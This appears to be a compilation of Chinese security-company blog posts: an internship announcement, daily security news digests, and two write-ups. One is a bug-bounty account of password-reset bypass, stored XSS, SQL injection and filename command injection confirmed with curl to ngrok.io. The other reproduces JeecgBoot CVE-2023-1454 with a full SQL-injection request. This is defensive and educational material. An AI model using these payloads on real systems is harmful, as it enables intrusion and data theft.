感恩成长,砥砺前行——中南大学携手蚁景科技实习实训圆满结束
导语:2023年7月中旬,由中南大学与湖南蚁景科技有限公司共同组织的实习实训圆满结束。
在网络信息技术日新月异的时代背景下,当代大学生对网络安全前沿技术、就业趋势、企业实际用人需求等方面的认知存在一定差距,同时缺乏真正的企业实习实践经历来提升动手能力。在学校老师带队下,由中南大学信息安全专业和计算机科学与技术专业学子组成的实训队伍,走进湖南蚁景科技有限公司,展开了为期三周的实训,近距离感受企业氛围与文化。
实训合影
作为一家专注于网络安全领域的公司,湖南蚁景科技有限公司一直以来都非常重视与高校之间的紧密联系与合作。我们深知,优秀的网络安全专业人才的培养对于行业的发展至关重要。实习实训作为公司与学校间的中间环节,不仅是学生们将理论知识转化为实践能力的重要机会,也是我们公司与高校合作的重要桥梁。
实训期间,我们配备了专业的企业导师、专业的实验课程与实际案例,让学生们能够在实践学习中学习解决问题的能力。导师通俗易懂的授课方式及理论联系实践的操作,让同学们切身体验了网安学习的乐趣。
实训场景
渗透测试岗位让学生们深入了解网络系统的漏洞和安全风险,并通过模拟攻击来测试系统的安全性。而在Web安全岗位上,学生们将学习如何发现和修复网站中的安全漏洞,提供更安全的在线环境。
在表彰大会上,中南大学实训带队老师为本次实训做出总结,表达了对本次实习实训的充分肯定。学生代表上台依次做学习总结。
表彰会现场
本次实习实训的顺利开展,离不开中南大学校方对我司的信任与肯定;我司凭借多年在实习实训方面的丰富经验,已联合多个高校开展此类实习活动。我们期待更多高校加入到校企联合实习实训的队伍中来。
同时,我们也将不断努力提升自身的专业水平,为学生们提供更好的实习实训环境和机会,为网络安全领域的发展贡献我们的力量。
网络安全日报 2023年07月21日
1、BlackCat 和 Clop勒索软件团伙同时入侵了化妆品巨头雅诗兰黛
https://www.freebuf.com/news/372587.html 据BleepingComputer 7月19日消息,化妆品巨头雅诗兰黛最近遭到了来自两个不同勒索软件的攻击。
2、P2PInfec蠕虫针对 Linux和 Windows 系统上的 Redis 服务器
https://securityaffairs.com/148636/malware/p2pinfect-a-rusty-p2p-worm-targets-redis-servers-on-linux-and-windows-systems.html 网络安全研究人员发现了一种名为 P2PInfect 的新点对点 (P2P) 蠕虫,其目标是 Redis 服务器。
3、Adobe紧急更新解决了被利用的 ColdFusion 零日漏洞
https://securityaffairs.com/148625/hacking/coldfusion-zero-day.html Adobe 发布了紧急更新,以解决 ColdFusion 中的关键漏洞,其中包括被积极利用的零日漏洞。
4、新的 AMI BMC 漏洞可导致接管和物理损坏,影响数百万台设备
https://www.securityweek.com/new-ami-bmc-flaws-allowing-takeover-and-physical-damage-could-impact-millions-of-devices/ 固件和硬件安全公司 Eclypsium 披露了其研究人员在 American Megatrends (AMI) MegaRAC 基板管理控制器 (BMC) 软件中发现的两个新漏洞的信息。AMI制造的BMC存在于全球数以百万计的设备中,应用于安培、华擎、华硕、Arm、戴尔、技嘉、HPE、华为、浪潮、联想、Nvidia、高通、广达、泰安等大公司的产品中。
5、Turla组织使用DeliveryCheck恶意软件进行攻击活动
https://cert.gov.ua/article/5213167 研究人员称,Turla黑客组织正在发起新一轮的攻击活动,并使用新型“DeliveryCheck”恶意软件针对国防工业和微软Exchange服务器进行攻击。Turla组织又名Secret Blizzard、KRYPTON、UAC-0003,被认为是俄罗斯的APT组织。攻击者利用包含Excel XLSM附件的钓鱼邮件发起攻击,这些文件中包含恶意宏,执行后将会执行PowerShell命令,并创建仿冒Firefox浏览器更新程序的计划任务。该计划任务将下载DeliveryCheck后门(也称为CapiBar和GAMEDAY)并在
6、通用电气修复Cimplicity产品中的安全漏洞
https://www.securityweek.com/recently-patched-ge-cimplicity-vulnerabilities-reminiscent-of-russian-ics-attacks/ 通用电气Cimplicity人机界面(HMI)和监控与数据采集(SCADA)产品中含有安全漏洞,其中一个被标记为CVE-2023-3463,是一个远程代码执行漏洞。通用电气发布了一个安全补丁,并指出只有通过本地访问系统的身份验证用户从恶意来源获取并打开文档,该漏洞才有可能被利用,因此用户的安全部署和强大的访问管理至关重要。除此之外,还存在13个漏洞,包括未初始化的指针、越
7、多个 DDoS 僵尸网络利用最近的 Zyxel 漏洞
https://www.securityweek.com/multiple-ddos-botnets-exploiting-recent-zyxel-vulnerability/ 据网络安全公司 Fortinet 报道,多个分布式拒绝服务 (DDoS) 僵尸网络正在瞄准 Zyxel 防火墙中的一个漏洞,该漏洞的补丁自 4 月份以来就已发布。该问题被追踪为CVE-2023-28771(CVSS 评分为 9.8),被描述为导致远程执行操作系统命令的错误消息处理错误。
8、著名黑客凯文·米特尼克去世,享年 59 岁
https://www.securityweek.com/famed-hacker-kevin-mitnick-dead-at-59/ 国外媒体披露,美国网络安全咨询师、第一个被美国联邦调查局(FBI)通缉的天才黑客凯文・米特尼克(Kevin David Mitnick)于 2023 年 7 月16 日去世,享年59 岁。
9、乌克兰捣毁大型机器人账户窝点,没收 15 万张 SIM 卡
https://www.bleepingcomputer.com/news/security/ukraine-takes-down-massive-bot-farm-seizes-150-000-sim-cards/ 网络警察确定,攻击者使用特殊设备和软件在各种社交网络中注册了数千个机器人帐户,发布了违反乌克兰规范和立法的广告。
10、Oracle发布508个安全更新,包含数十个高危漏洞的安全更新
https://www.securityweek.com/oracle-releases-508-new-security-patches-with-july-2023-cpu/ Oracle发布508个安全更新,其中包含针对数十个针对高危漏洞进行修复的安全更新。作为本季度安全更新的一部分,对金融服务产品的补丁数量最多,为147个。在已解决的漏洞中,115个可以被具有网络访问权限的未经身份验证的远程攻击者利用。Oracle建议客户及时应用可用的修补程序,或阻止网络访问未修复的应用程序,以降低遭受攻击的风险。目前已经发现相关安全漏洞被恶意利用,未经修复的Oracle产品已成为攻击的目标。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
从密码重置打到Getshell和其它漏洞打包
前言
前几天是准备上点edusrc的分的所以就准备用手上还没刷的Nday继续上分,然后就有了今天这个案例:
信息收集
之前在挖某体育学院证书的时候就挖到过一个通过修改html文件更改密码修改步骤的漏洞
所以就准备测绘一下这个资产继续看看能不能上分
挑一个打开:
没有背景图了但还是同资产,因为在测试某体育学院的时候是有账户的,所以直接输入那个账户就能进行下一步操作了,但是这个资产无账户,所以我打算去在搜集一下学号之类的
学号这块都是一无所获,然后正准备想其它切入点的时候就突然发现
这块的要求是输入学号后5位,而学号通常是有规律的,所以就去生成字典FUZZ了一下
Python输出从00000~99999字典的程序为:
dictionary = {}
for i in range(100000):
key = str(i).zfill(5)
value = \"Value \" + key
dictionary\[key\] = value
with open(\'dict.txt\', \'w\') as file:
for key, value in dictionary.items():
file.write(key + \'\\n\')
载入字典后还要设置下时间
最后成功拿到几个账户
EDUSRC不收爆破类漏洞所以这个学号不能算是漏洞,但最后学号总归是出来了
随后直接输入FUZZ出的5位学号把
https://1.test.edu.cn/passworf/find1_html后的find1_html改为find2_html
直接输入我们要重置的密码更改成功后去登录后台:
持续浏览功能点寻找突破点:
发现一个活动添加点
不存在上传点但是存在描述功能,直接构造xss的payload试试:
<Script>alert("1)</Script>
存储XSS+1
此处的payload:<Script>alert("1)</Script>
采用大小写绕过
随后又发现一个信息上传点:
这几块点是透明没开bp,然后就打算开BP看看能不能拿到些什么突破口
点击这块的【添加简历信息】下面的标题处的第一个点
发现是个信息编辑界面但它这块是跳出个小窗口的所以前面没怎么注意到开了BP抓包时才发现这块点:
点击右侧的修改抓包后:
发现id值,直接单引号闭合查看:
浏览器端:
发现执行了sql语句
且发现是GET请求:
所以把这块的路径拉到浏览器直接访问
这样就不用担心防sqlmap表单了,且不用打包数据包更快捷了
Sqlmap成功跑出数据!
Sql注入+1
随后继续到【会员注册】处
直接在搜索处单引号闭合:
成功执行查询语句
F12调出网络又发现也是GET请求方式,复制请求URL直接查看回显
直接sqlmap跑
Sql注入+2
然后点击右上角【管理员】三个字
一开始没发现这三个字还能点击,点击后发现到了信息上传点:
这块可以上传文件先上传个php试试
提示只能上传上面列出的文件类型,正要准备想其它办法绕过的时候突然发现这块允许上传的文件类型中包括pdf,所以直接上传一个pdf-xss试试:
成功上传然后浏览器访问试试:
但浏览器提示没有文件,然后仔细看了一下文件上传回显:
这里的uploadfile/16893293978.pdf的路径是跟在了?value=参数后面的然后这块参数给完后还在后面又跟了个参数:
?file=url=uploadfile/16893293978.pdf,再回到请求包中的参数:
发现此处的有个&field=url的参数尝试把参数改成1
浏览器回显不存在"1",所以这块就明了的,参数&field=后面应该接的参数是文件上传后的路径,因为我们这块输入1,不存在1这个文件所以回显NotFound ,明了了这块所以我们那文件试试:
放包:
成功触发XSS
存储xss+2
但是这块的任务是getshell所以还是继续尝试文件上传
修改MIME信息且php5分段绕过但还是提示不能上传,传了图片马但是不能解析
这块上传应该是写死了,所以继续找其它突破口,查看参数发现存在"filename"
问题参数啊,迅速添加延时命令试试:
`sleep 7`
回显处成功延时:
命令执行成功!进一步探测:
Curl命令探测ngrok.io
成功回显!
命令执行+1,最后相对应的用命令获取shell就行
总结
整体难度适中只不过这次测试后台功能点有点多需要仔细观察测试,后台的信息收集做好了Getshell难度瞬间就变小了。
网络安全日报 2023年07月20日
1、研究人员发现冒充安全公司的SophosEncrypt勒索软件
https://www.bleepingcomputer.com/news/security/cybersecurity-firm-sophos-impersonated-by-new-sophosencrypt-ransomware 研究人员近期发现一种冒充安全公司的SophosEncrypt勒索软件,该勒索软件使用Rust语言进行编写。SophosEncrypt勒索软件使用AES256加密算法,在加密文件的每个文件夹中放置一个名为information.hta的勒索信,并在加密完成后自动打开该勒索信。勒索信中记录了受害者被攻击的信息及相关联系信息。该勒索软件会对Windows桌面壁纸进行
2、攻击者利用谷歌云构建服务中的漏洞发起供应链攻击
https://orca.security/resources/blog/bad-build-google-cloud-build-potential-supply-chain-attack-vulnerability 研究人员在谷歌云构建服务中发现了一个设计漏洞,该漏洞使攻击者能够提升权限,从而使他们能够未经授权访问谷歌构件注册表中的代码库。攻击者可以操纵谷歌构件注册表中的镜像并注入恶意代码,根据受感染镜像构建的任何应用程序都会受到影响,其潜在风险包括拒绝服务(DoS)攻击、数据泄露和传播恶意软件。更糟糕的是,如果被感染的应用程序被部署在客户的环境中,风险就会转移到客户的环境中,从而形成供
3、Citrix修复其ADC和网关产品中的零日漏洞
https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467 Citrix发布安全公告,提醒客户注意NetScaler ADC和NetScaler Gateway产品中的一个高危漏洞,该漏洞被标记为CVE-2023-3519,CVSS评分为9.8,本月早些时候已经有人在黑客论坛中对该漏洞进行了披露。攻击者可以利用该漏洞在未经身份验证的情况下远程执行代码。Citrix表示,已经发现攻击者在受影
4、医疗设备制造商BD公司在其产品中发现多个安全漏洞
https://www.govinfosecurity.com/medical-device-maker-flags-8-flaws-in-drug-infusion-products-a-22562 医疗设备制造商Becton,Dickinson and Company(BD公司)在公告中表示,已通过例行内部安全测试发现其BD Alaris Guardrails Suite MX中的八个安全漏洞漏洞,这些漏洞影响该产品的12.1.3及更早版本。BD公司表示,他们已经对所有的八个漏洞进行了风险评估,并确定该产品的现有控制措施能够降低面临风险的可能性。该公司表示,剩余的风险处于可以接受的范围,
5、Hive0129组织针对拉丁美洲的金融机构进行攻击
https://securityintelligence.com/posts/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan 研究人员发现了几封2023年4月底至5月的钓鱼邮件,攻击者冒充政府机构,诱导用户点击右邮件中的链接,并最终执行一种名为BlotchyQuasar的恶意软件,该恶意软件与Hive0129组织相关联。BlotchyQuasar是在QuasarRAT代码的基础上进行开发的,该恶意软件中包含银行应用程序的硬编码列表,目前正在持续开发中,并支持各种不同的自定义命令。BlotchyQua
6、国际汽联世界耐力锦标赛车手护照泄露
https://securityaffairs.com/148587/security/fia-world-endurance-championship-data-leak.html Cybernews 研究小组发现,运营国际汽联世界耐力锦标赛网站的勒芒耐力赛管理公司通过泄露数百名车手的身份证件和驾照,泄露了他们的数据。
7、CISA命令政府机构缓解Windows和Office零日漏洞
https://www.bleepingcomputer.com/news/security/cisa-orders-govt-agencies-to-mitigate-windows-and-office-zero-days/ CISA命令联邦机构减轻远程代码执行零日影响Windows和Office产品,这些产品被总部位于俄罗斯的RomCom网络犯罪集团在北约网络钓鱼攻击中利用。
8、Meta 因侵犯隐私而面临每日 10 万美元的罚款
https://cybernews.com/news/meta-fined-hundreds-thousands-daily/ 挪威数据保护机构表示,Facebook和Instagram所有者Meta将因侵犯隐私而被罚款10万美元,除非采取补救措施。
9、网络犯罪论坛BreachForums的管理员认罪,最高面临30年监禁
https://www.secrss.com/articles/56806 BreachForums在被FBI查封之前被认为是世界上最大的英语数据泄露论坛,该论坛拥有超过333000名会员、888个数据库、140亿个人记录。
10、匿名苏丹对美国政府机构NIST发起有针对性的网络攻击
https://thecyberexpress.com/nist-cyber-attack-anonymous-sudan/ 美国政府组织国家标准与技术研究院(NIST)最近被匿名苏丹黑客组织列为网络攻击的目标。根据威胁情报服务Falcon Feeds的一条推文,在NIST网络攻击之后,官方网站无法访问。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年07月19日
1、研究人员称NoEscape勒索组织与Avaddon存在关联
https://www.bleepingcomputer.com/news/security/meet-noescape-avaddon-ransomware-gangs-likely-successor NoEscape勒索组织出现于2023年6月份,该勒索组织针对企业进行双重勒索攻击。攻击者对Windows、Linux系统和VMware ESXi服务器进行攻击,窃取数据并对文件进行加密。该勒索组织所勒索的金钱从数十万美元到一千多万美元不等,并已经在其数据泄露网站上列出了来自不同国家和行业的十个受害者。研究人员在对NoEscape勒索组织的加密程序进行研究后表示,该组织使用的加密程序与Av
2、攻击者利用WooCommerce Payments插件漏洞进行攻击活动
https://www.wordfence.com/blog/2023/07/massive-targeted-exploit-campaign-against-woocommerce-payments-underway Wordfence警告称,攻击者正在利用Woocommerce Payments插件中的漏洞针对157000多个网站进行大规模的攻击活动。该漏洞被标记为CVE-2023-28121,此次攻击活动从7月14日开始,在周末期间持续,并于7月16日达到高峰,对157000个网站的总攻击量达到130万次。Wordfence表示,攻击者正在利用该漏洞在目标网站中安装WP控制台插件或创
3、研究人员发现一种名为WormGPT的恶意工具
https://slashnext.com/blog/wormgpt-the-generative-ai-tool-cybercriminals-are-using-to-launch-business-email-compromise-attacks 研究人员近期在黑客论坛中发现了一种名为WormGPT的恶意攻击,该工具是专门为恶意攻击活动设计的GPT模型。WormGPT是一个基于GPTJ语言模型的人工智能模块,于2021年开发。它拥有一系列功能,包括无限字符支持、聊天内存保留和代码格式化等。WormGPT据称是在各种数据源上进行训练的,特别是集中在与恶意软件相关的数据上。然而,其开发者对
4、Virustotal 数据泄露暴露了一些注册客户的数据,包括情报成员
https://securityaffairs.com/148577/security/virustotal-leaked-customers-data.html 据德国报纸报道,在线恶意软件扫描服务 VirusTotal 泄露了与一些注册客户相关的数据。
5、419约会应用程序声称 5000 万用户遭受数据泄露
https://www.vpnmentor.com/news/report-419dating-breach/ 网络安全研究员 Jeremiah Fowler 发现并向vpnMentor报告了一个包含大约 230 万条记录的无密码保护数据库。经过进一步调查,很明显这些记录与单个数据库中包含的多个约会应用程序相关联。该数据库似乎包含大量用户记录,包括客户姓名、帐号、电子邮件、密码等。
6、FIN8 使用改进的 Sardonic 后门传播 Noberus 勒索软件
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/Syssphinx-FIN8-backdoor 网络犯罪组织 FIN8 正在使用 Sardonic 后门的改进版本来传播 BlackCat 勒索软件。
7、思科修复 SD-WAN vManage 中的一个关键漏洞
https://securityaffairs.com/148524/security/cisco-sd-wan-vmanage-critical-bug.html 思科警告其 SD-WAN vManage 存在一个关键的未经验证的 REST API 访问漏洞,该漏洞被追踪为 CVE-2023-20214。
8、Gamaredon 黑客在入侵 30 分钟后开始窃取数据
https://www.bleepingcomputer.com/news/security/gamaredon-hackers-start-stealing-data-30-minutes-after-a-breach 乌克兰计算机应急小组(CERT-UA)警告说,Gamaredon 黑客攻击行动迅速,可在一小时内从被入侵系统中窃取数据。
9、欧盟敦促做好应对量子网络攻击的准备
https://www.infosecurity-magazine.com/news/eu-prepare-quantum-cyber-attacks/ 文件《欧洲量子网络安全议程》强调迫切需要制定一项新的欧盟协调行动计划,以便在 "Q日"(量子计算机能够破解现有加密算法的时间点)之前促进量子安全技术的发展。
10、腓尼基医疗中心证实其患者的数据泄露
https://www.hipaajournal.com/phoenician-medical-center-cyberattack-affects-up-to-162500-patients/ 腓尼基医疗中心股份有限公司(PMC)最近报告了一起安全事件,网络攻击导致其部分IT系统中断。此次攻击事件于2023年3月31日被发现,但尚不清楚攻击开始的具体时间,未经授权的攻击者访问了包含患者健康信息的文件。PMC确认受影响的信息包括姓名、联系信息、人口统计信息、出生日期、身份证号码、医疗记录号码、诊断和治疗信息、提供者姓名、服务日期、处方信息以及健康保险信息。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年07月18日
1、攻击者使用恶意Chrome扩展程序窃取Facebook账户
https://www.malwarebytes.com/blog/threat-intelligence/2023/07/criminals-target-businesses-with-malicious-extension-for-metas-ads-manager-and-accidentally-leak-stolen-accounts 近期,研究人员发现一个使用恶意Chrome扩展程序窃取Facebook账户凭据的攻击活动。攻击者在Facebook中推广虚假的广告管理软件,从而引诱用户下载包含恶意MSI安装程序的压缩包。在该MSI安装程序中包含一个批处理脚本和两个文件夹,其中包含
2、研究人员发现Docker Hub中的大量镜像泄露敏感数据
https://www.bleepingcomputer.com/news/security/thousands-of-images-on-docker-hub-leak-auth-secrets-private-keys 研究人员近期发布的一项研究表明,Docker Hub上托管的数万个容器镜像泄露敏感数据,从而使软件、在线平台和用户暴露在大规模攻击之下。研究人员分析了来自Docker Hub和数千个私人注册中心的337171个镜像,从中发现大约8.5%的镜像包含私钥和API机密等敏感数据。该论文进一步表明,许多公开的密钥被积极使用,从而破坏了依赖它们的元素的安全性。
3、JumpCloud证实遭受网络攻击
https://www.securityweek.com/jumpcloud-says-sophisticated-nation-state-targeted-specific-customers JumpCloud证实其遭受网络攻击。此次攻击始于6月22日的鱼叉式网络钓鱼活动,导致攻击者未经授权访问JumpCloud基础设施的特定区域。6月27日,该公司发现内部系统存在异常活动后,重置了凭据并采取了额外的安全措施。7月5日,在发现一小部分客户的命令框架中存在异常活动后,该公司重置了所有管理API密钥,并开始通知受影响的客户。JumpCloud表示,此次攻击的目标非常明确,仅限于特定客户。
4、Adobe 警告客户一个关键的ColdFusion RCE 在攻击中被利用
https://securityaffairs.com/148542/hacking/coldfusion-rce-attacks.html Adobe 警告客户存在一个严重的 ColdFusion 预身份验证 RCE 漏洞(编号为 CVE-2023-29300),该漏洞已被积极利用。
5、思科修复了 SD-WAN vManage 中的一个严重缺陷
https://securityaffairs.com/148524/security/cisco-sd-wan-vmanage-critical-bug.html 思科警告称,存在一个严重的未经身份验证的 REST API 访问漏洞(编号为 CVE-2023-20214),会影响其 SD-WAN vManage。
6、BlackLotus UEFI Bootkit 源代码在 GitHub 上泄露
https://securityaffairs.com/148482/malware/source-code-blacklotus-uefi-bootkit-leaked.html BlackLotus UEFI bootkit 的源代码已在 GitHub 上发布,专家警告自定义版本扩散的风险。
7、网络犯罪网站 BreachForums 所有者认罪
https://www.securityweek.com/owner-of-cybercrime-website-breachforums-pleads-guilty/ 臭名昭著的网络犯罪网站 BreachForums 的所有者康纳·布莱恩·菲茨帕特里克 (Conor Brian Fitzpatrick) 已在美国法院认罪。
8、黑客利用WebAPK欺骗Android用户安装恶意应用
https://thehackernews.com/2023/07/hackers-exploit-webapk-to-deceive.html 威胁行为者正在利用 Android 的WebAPK 技术来诱骗毫无戒心的用户在 Android 手机上安装旨在捕获敏感个人信息的恶意 Web 应用程序。
9、TeamTNT 的云凭证窃取活动现在针对Azure和 Google Cloud
https://thehackernews.com/2023/07/teamtnts-cloud-credential-stealing.html 一名恶意行为者与 2023 年 6 月发生的一次云凭证窃取活动有关,该活动主要针对 Azure 和 Google 云平台 (GCP) 服务,这标志着攻击者的目标范围已扩展到 Amazon Web Services (AWS) 之外。
10、超百万站点使用,WordPress 插件 AIOS 被曝以明文记录密码
https://www.freebuf.com/news/372245.html Bleeping Computer 网站披露,超过百万 WordPress 网站使用的 All-In-One Security(AIOS)WordPress安全插件被曝将用户尝试登录的明文密码记录到网站数据库中,此举可能危及账户安全。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
CVE-2023-1454注入分析复现
简介
JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。
影响版本
Jeecg-Boot<=3.5.1
环境搭建
idea+
后端源码:
https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip前端源码:
https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip安装npm,安装nodejs
https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi安装yarn
npm install -g yarn
下载依赖
yarn install
yarn run serve //起服务
由于是前后端分离,需要数据库导入表,使用navicat直接导入即可
后端服务端搭建,使用idea搭建导入项目,修改数据库配置
配置server端npm服务
配置好之后直接启动,访问
http://localhost:3100/login搭建成功
漏洞复现
前后端分离,后端端口8080 ,Payload:
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length: 128
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
分析
漏洞产生点位于积木报表插件内,查看更新的3.5.1的版本更新
更改了72处的文件,其中需要注意db/其他数据库/jeecgboot-sqlserver2019.sql中重写了数据插入的方法
jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java中增加了对sql语句的正则
这个修复是针对于后端的SQL注入,/sys/duplicate/check
目前最新更新的3.5.1版本似乎依旧没有针对积木报表注入点儿的加固措施,修复时更换jar包
目前积木官方的jar包已升级。
关注积木5月份的升级日志
http://jimureport.com/doc/log小结
github上有师傅们的脚本,但是如果要批量使用的话建议在修改一下response的内容,仅仅只有操作失败的报错的话会存在大批量的报错。
所有自定义的if判断的回显都建议修改一下,如有错误欢迎指出。
网络安全日报 2023年07月17日
1、研究人员发现新型恶意软件TOITOIN
https://www.zscaler.com/blogs/security-research/toitoin-trojan-analyzing-new-multi-stage-attack-targeting-latam-region 研究人员最近发现一个针对拉丁美洲用户的攻击活动。在此次攻击活动中,攻击者利用多阶段的攻击链执行定制的模块,例如将恶意代码注入到进程中、通过COM组件绕过用户账户控制、 规避沙箱检测等,最终投递一个名为“TOITOIN”的新型恶意软件。该恶意软件采用独特的XOR解密技术对配置文件进行解密,收集系统信息,并对已安装浏览器及Topaz OFD产品中的相关数据进行窃
2、攻击者利用Office文档漏洞传播LokiBot窃密木马
https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros 研究人员近期发现了几个利用已知漏洞的恶意Office文档文件,包括两个远程代码执行漏洞CVE-2021-40444和CVE-2022-30190。利用这些漏洞,攻击者可以在文档中嵌入恶意宏,当恶意宏执行后会将LokiBot窃密木马植入受害者系统中。LokiBot窃密木马于2015年出现,它针对Windows操作系统进行攻击,用于从受害主机中窃取敏感数据,
3、攻击者利用恶意的TeamViewer安装程序传播njRAT远控木马
https://blog.cyble.com/2023/07/13/trojanized-application-preying-on-teamviewer-users 研究人员近期发现,攻击者正利用恶意的TeamViewer安装程序传播njRAT远控木马。该安装程序执行后,会释放正常的TeamViewer应用程序及njRAT。njRAT将自身复制到“AppData\Local\Temp”路径中并更名为“System.exe”,通过设置注册表项更改安全设置,并创建防火墙规则允许其于C2服务器进行通信。njRAT通过修改注册表项及复制到启动目录中实现持久化,能够执行键盘记录、收集系统信息等功能
4、思科SD-WAN vManage软件存在安全漏洞
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-unauthapi-sphCLYPA 5、 AVrecon恶意软件感染超过70000台路由器以构建僵尸网络
https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/ 研究人员发现了一起持续多年的针对路由器的攻击活动,感染小型办公室/家庭办公(SOHO)路由器,并最终部署一种名为“Avrecon”、基于Linux的远控木马。该恶意软件于2021年5月被发现,且已经在两年多的时间内未被观察到。由于该恶意软件较为隐蔽,受感染设备的所有者很少能够注意到包括服务中断或宽带损失在内的异常情况。研究人员发现该恶意软件已经感染全球70000多台设备,并在40000多个设备中进行持久化,从而构建僵尸网络。
6、美国科罗拉多州立大学证实其数据泄露
https://source.colostate.edu/moveit-software-cyberattack-notification 科罗拉多州立大学(CSU)证实,受到最近MOVEit Transfer事件的影响,该校学生及员工的个人信息泄露。该校于7月12日通知其学生及教职员工,攻击者通过攻击窃取了他们的个人数据,可能包括姓名、出生日期、身份号码、社会保障号码以及人口统计信息。这些被盗数据最早可以追溯到2021年,因此一些毕业生的数据也受到了影响。由于此次数据泄露事件是由于使用MOVEit Transfer平台的供应商遭到攻击,并且这些供应商也为美国的多所大学提供服务,因此未来可能
7、Juniper修复Junos OS中的多个安全漏洞
https://www.securityweek.com/juniper-networks-patches-high-severity-vulnerabilities-in-junos-os 网络设备制造商Juniper Networks发布了软件更新,以修复Junos OS、Junos OS Evolved和Junos Space中的多个安全漏洞。在此次发布的更新公告中,有三个公告涉及Junos OS和Junos OS Evolved中可能导致拒绝服务(DoS)的高危漏洞,这些漏洞影响QFX10000、MX和SRX系列网络设备。其他八个公告涉及中等安全漏洞,这些漏洞也可能被利用来利用导致D
8、研究人员发现Adobe InDesign中的多个安全漏洞
https://www.fortinet.com/blog/threat-research/adobe-indesign-zero-day-vulnerabilities 研究人员于今年3月发现Adobe InDesin中的多个安全漏洞并向Adobe进行了报告,在2023年7月11日,Adobe发布了针对这些安全漏洞的更新补丁。受影响的平台涉及Windows和macOS操作系统,受影响的版本为Adobe InDesign 2023 18.3及更早版本、Adobe InDesign 2022 17.4.1及更早版本,这些漏洞将会导致内存泄漏或任意代码执行。由于这些漏洞的严重性,研究人员建议用户
9、研究人员在QuickBlox框架中发现多个安全漏洞
https://www.hackread.com/exploitable-flaws-quickblox-expose-user-records 研究人员在QuickBlox框架中发现了多个安全漏洞。QuickBlox是一种流行的聊天和视频服务,广泛应用于智能物联网设备、金融和远程医疗网络以及iOS和Android移动应用程序。这些漏洞是研究人员在检查Rozcom的对讲机移动应用程序时发现的,该应用程序基于QuickBlox框架。研究人员能够利用这些漏洞下载用户数据库,接管账户和所有Rozcom对讲机设备,并完全访问设备摄像头和麦克风。他们还能够进行窃听,并打开其设备管理的大门。
10、黑客通过零日漏洞入侵Lemmy网站
https://www.securityweek.com/hackers-target-reddit-alternative-lemmy-via-zero-day-vulnerability/ Lemmy是一款开源软件,旨在运行自托管的新闻聚合和讨论论坛,目前有1100多个实例,用户总数近85万。几天前,攻击者开始利用与自定义表情符号呈现相关的跨站点脚本(XSS)漏洞对其一些流行实例上的页面进行了破坏,并篡改页面将用户重定向至一些令人不适的内容。Lemmy目前对该漏洞进行了修复,并建议用户更改JWT密钥。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年07月14日
1、苹果重新发布快速安全响应来修复最近披露的零日漏洞
https://securityaffairs.com/148441/security/apple-second-rapid-security-response.html 在修复了由第一个 RSR 引起的某些网站上的浏览问题后,Apple 重新发布了适用于 iOS 和 macOS 的快速安全响应更新。
2、Zimbra 敦促客户修复 Google TAG 报告的被利用的零日漏洞
https://securityaffairs.com/148429/hacking/zimbra-collaboration-suite-zeroday.html Zimbra 已发布更新,以解决针对 Zimbra Collaboration Suite (ZCS) 电子邮件服务器的攻击中被积极利用的零日漏洞。Zimbra 敦促客户手动安装更新以修复正在积极修复的零日漏洞。
3、SonicWall 敦促组织修复 GMS/Analytics 产品中的严重漏洞
https://securityaffairs.com/148411/security/sonicwall-critical-flaws-gms-analytics.html SonicWall 修复了多个影响其 GMS 防火墙管理以及分析管理和报告引擎的关键漏洞。
4、GitHub 虚假 Linux内核漏洞PoC 让研究人员遭受恶意软件攻击
